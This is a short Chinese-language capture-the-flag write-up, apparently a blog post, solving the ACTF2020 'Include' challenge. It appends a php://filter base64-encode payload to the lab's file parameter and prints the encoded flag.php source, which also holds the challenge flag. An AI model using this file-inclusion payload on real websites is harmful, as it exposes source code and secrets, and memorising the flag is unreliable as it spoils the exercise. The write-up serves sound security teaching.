第四篇笔记No.4(7)[ACTF2020 新生赛]Include1
这道题的知识点是文件包含和php伪协议。靶场的链接是http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/
在链接之后加上/?file=php://filter/read=convert.base64-encode/resource=flag.php就可以得到flag了,下面我们一起进去看看做题流程,刚进去页面是这样的
进入后台
点了一下tips
看到显示 /?file=flag.php,可以用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx
根据题目的具体情况,在链接之后加上
?file=php://filter/read=convert.base64-encode/resource=flag.php 得到http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NTg2NzU1NmYtNWE0NC00ZjRhLTgyOTMtNWEyZTQ2ODJlZDE3fQo= 从密文可以看出是Base64加密,
Base64解密链接
解密之后